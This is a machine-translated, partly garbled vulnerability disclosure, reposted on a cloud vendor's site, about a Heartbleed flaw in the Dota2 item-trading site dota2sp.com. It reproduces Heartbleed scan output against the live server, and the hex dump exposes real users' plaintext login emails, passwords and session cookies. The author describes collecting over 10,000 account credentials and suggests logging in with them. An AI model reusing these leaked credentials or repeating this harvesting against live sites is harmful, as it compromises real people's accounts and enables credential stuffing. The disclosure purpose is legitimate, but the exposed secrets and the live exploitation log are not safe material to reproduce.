Improper O & M of Dota2 jewelry transactions exposes usernames and passwords and cookies (10 K + account passwords are collected)

Source: Internet
Author: User

Improper O & M of Dota2 jewelry transactions exposes usernames and passwords and cookies (10 K + account passwords are collected)

Dota2 jewelry Trading Market improper O & M leakage of usernames and passwords and cookies (10 K + account password collected) has been deleted after testing

RT Dota2 jewelry trading market main site http://www.dota2sp.com/exist HeartBleed plaintext leakage username and password cookies... This vulnerability may cause further harm (for example, the user name and password are used for dictionary tests on mainstream Chinese websites .. The account contains cash, weapons, and equipment... Although I have not played games for N years .. --





Heartbleed Vulnerability (Heartbleed bug), also referred to as Heartbleed vulnerability, is a program error that occurs in the encryption library OpenSSL. It was first disclosed in April 2014. This library is widely used to implement Transport Layer Security (TLS) protocols on the Internet. As long as you use a defective OpenSSL instance, both the server and the client may be attacked. This problem occurs because the input is not properly verified (the border check is missing) [3] During TLS heartbeat scaling. Therefore, the vulnerability name comes from heartbeat) [4]. The program error is a buffer read [5], that is, the data that can be read is more than the data that should be allowed to be read [6]



ZZ wiki

...



Let's test the image first...









Scanning www.dota2sp.com on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 4757
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 6F 6E 6E 65 ....#.......onne
00e0: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 ction: Keep-Aliv
00f0: 65 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 64 6F 74 e..Host: www.dot
0100: 61 32 73 70 2E 63 6F 6D 0D 0A 55 73 65 72 2D 41 a2sp.com..User-A
0110: 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 gent:Mozilla/5.0
0120: 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 (compatible; MS
0130: 49 45 20 39 2E 30 3B 20 57 69 6E 64 6F 77 73 20 IE 9.0; Windows
0140: 4E 54 20 36 2E 31 3B 20 54 72 69 64 65 6E 74 2F NT 6.1; Trident/
0150: 35 2E 30 29 3B 20 33 36 30 53 70 69 64 65 72 0D 5.0); 360Spider.
0160: 0A 0D 0A 5B 1C FB 9F 6A 25 1A A5 F9 85 24 B5 FE ...[...j%....$..
0170: 01 A1 4F 78 16 DD 63 32 5B 8F 60 00 F1 6B EE FC ..Ox..c2[.`..k..
0180: C4 53 68 99 85 D6 00 BA 51 3E EB 61 A7 C3 D6 D8 .Sh.....Q>.a....
0190: 58 FB 3C 8B 9F 77 77 77 2D 66 6F 72 6D 2D 75 72 X.<..www-form-ur
01a0: 6C 65 6E 63 6F 64 65 64 0D 0A 52 65 66 65 72 65 lencoded..Refere
01b0: 72 3A 20 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 r: https://www.d
01c0: 6F 74 61 32 73 70 2E 63 6F 6D 2F 73 73 6C 2F 6C ota2sp.com/ssl/l
01d0: 6F 67 69 6E 0D 0A 41 63 63 65 70 74 2D 45 6E 63 ogin..Accept-Enc
01e0: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def
01f0: 6C 61 74 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E late..Accept-Lan
0200: 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B guage: zh-CN,zh;
0210: 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 48 q=0.8..Cookie: H
0220: 6D 5F 6C 76 74 5F 33 38 66 62 39 37 39 31 37 30 m_lvt_38fb979170
0230: 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 39 587afeb07c5e0e59
0240: 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 36 36 e86465=145385966
0250: 35 3B 20 48 6D 5F 6C 70 76 74 5F 33 38 66 62 39 5; Hm_lpvt_38fb9
0260: 37 39 31 37 30 35 38 37 61 66 65 62 30 37 63 35 79170587afeb07c5
0270: 65 30 65 35 39 65 38 36 34 36 35 3D 31 34 35 33 e0e59e86465=1453
0280: 38 35 39 36 36 37 0D 0A 0D 0A 72 75 72 6C 3D 25 859667....rurl=%
0290: 32 46 73 73 6C 25 32 46 6C 6F 67 69 6E 26 55 73 2Fssl%2Flogin&Us
02a0: 65 72 4E 61 6D 65 3D 35 38 32 34 34 33 34 39 34 erName=582443494
02b0: 25 34 30 71 71 2E 63 6F 6D 26 50 61 73 73 77 6F %40qq.com&Passwo
02c0: 72 64 3D 6E 69 61 6E 31 31 30 33 32 34 70 E6 2B rd=nian110324p.+
02d0: 7E 62 F4 1B 86 27 D3 10 02 0F 98 3A B7 34 37 32 ~b...'.....:.472
02e0: 30 36 35 38 32 25 34 30 71 71 2E 63 6F 6D 26 50 06582%40qq.com&P
02f0: 61 73 73 77 6F 72 64 3D 67 78 73 72 7A 31 32 33 assword=gxsrz123
0300: 34 35 70 93 F4 AA EE 85 82 52 70 C2 82 BB 1B 92 45p......Rp.....
0310: 0A 0F 64 3D 79 6C 6D 69 68 61 6E 67 69 36 21 9F ..d=ylmihangi6!.
0320: 67 EB 73 AD E7 29 D7 10 0F AC FD 96 C4 AD 4C EB g.s..)........L.
0330: 9D FC 79 16 6B 69 E8 99 66 22 B1 9C 5A B9 C2 A2 ..y.ki..f"..Z...
0340: 58 C7 82 91 B7 C9 F7 2C 31 34 35 33 38 35 37 35 X......,14538575
0350: 37 32 2C 31 34 35 33 38 35 39 32 37 34 3B 20 48 72,1453859274; H
0360: 6D 5F 6C 70 76 74 5F 33 38 66 62 39 37 39 31 37 m_lpvt_38fb97917
0370: 30 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 0587afeb07c5e0e5
0380: 39 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 32 9e86465=14538592
0390: 39 31 0D 0A 0D 0A 72 75 72 6C 3D 25 32 46 6D 79 91....rurl=%2Fmy
03a0: 74 72 61 64 65 73 26 55 73 65 72 4E 61 6D 65 3D trades&UserName=
03b0: 38 33 34 39 37 36 39 37 33 40 71 71 2E 63 6F 6D [email protected]
03c0: 26 50 61 73 73 77 6F 72 64 3D 61 31 33 30 30 33 &Password=a13003
03d0: 33 32 32 35 35 35 DB 07 E4 B3 BE 67 F0 26 A3 D2 322555.....g.&..
03e0: 15 3B 0F D7 07 ED 9E 47 7A 02 05 05 05 05 05 05 .;.....Gz.......
03f0: 57 21 DD 4C B2 5C 9B 32 84 15 AE A5 DB 68 F3 CD W!.L.\.2.....h..
0400: C3 D1 F7 83 CB FA 9B 21 F4 B7 21 9C C7 37 8A 68 .......!..!..7.h
0410: 6E B8 DA 4C 67 DA A3 14 F8 94 F3 E7 E3 DA 18 F6 n..Lg...........
0420: 71 5F AB 72 DF 57 E9 29 3D BD 76 16 AA 19 D4 81 q_.r.W.)=.v.....
0430: 02 E7 0B 47 B6 1E A5 79 79 C6 D7 98 E7 8C 42 7E ...G...yy.....B~
0440: D8 48 0C 26 CF D1 D8 DE 5C 9B A0 4E C5 6C D7 36 .H.&....\..N.l.6
0450: C4 16 B5 E3 29 55 FA C3 E7 62 B5 31 48 74 5C 21 ....)U...b.1Ht\!
0460: A4 E4 5F A5 3E C1 0A 3A F7 15 CA C9 82 B5 1F C1 .._.>..:........
0470: 96 96 5F 4D 85 87 64 00 C1 CC 88 54 9D 20 75 31 .._M..d....T. u1
0480: 69 93 C7 2E 62 8E 35 73 83 D8 52 9A AF CA DD 16 i...b.5s..R.....
0490: EC F8 DE 37 FA 21 3D BE EE CB D7 BF A1 3D 03 1D ...7.!=......=..
04a0: 19 21 DB AB 8B BD F2 87 5A 95 AB 67 BC C6 60 BD .!......Z..g..`.
04b0: 68 1B AF 03 15 5A 54 46 41 AB 72 7B 3C 81 95 28 h....ZTFA.r{<..(
04c0: 8F D2 E3 C8 20 BE D3 0D DC 14 4E 5C C0 92 0D 27 .... .....N\...'
。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。
WARNING: server www.dota2sp.com returned more data than it should - server is vulnerable!





A 10 k account password has been collected for the test. (vim already exists. Review it here.



However, you must first use sort.

(The collected account password has been deleted)





Just log on and check it out.















Solution:

Fix issue ....

Do you have a gift...

.. Notify the user to change the password

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.